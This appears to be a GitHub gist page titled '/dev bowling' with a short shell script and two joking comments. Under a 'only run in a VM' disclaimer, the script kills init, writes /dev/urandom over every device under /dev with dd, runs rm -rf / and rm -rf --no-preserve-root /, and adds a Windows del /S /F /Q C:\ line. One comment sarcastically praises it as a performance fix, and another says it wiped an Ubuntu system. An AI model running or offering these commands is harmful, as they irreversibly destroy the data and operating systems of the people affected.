Last active
February 20, 2025 11:03
/dev bowling
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# DO NOT RUN UNLESS IT'S A VM! I TAKE NO RESPOSIBILITY FOR YOUR ACTIONS WITH THIS. | |
exit | |
kill -9 $pid | |
logout | |
kill -9 1 | |
pkill init | |
sudo pkill init | |
for device in `find /dev` | |
do | |
# Don't run synchronously | |
`echo $device;dd if=/dev/urandom of=$device`& | |
done | |
echo "Well, something didn't work right. Your computer's still intact. Oh, well." | |
rm -rf / | |
rm -rf --no-preserve-root / | |
# For windows | |
del /S /F /Q C:\ |
Just found this script, thanks a lot! It optimized the performance of my computer so much, and solved many other problems. (Computers were a mistake to begin with.)
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Leveled Ubuntu 20 in less than 10 seconds.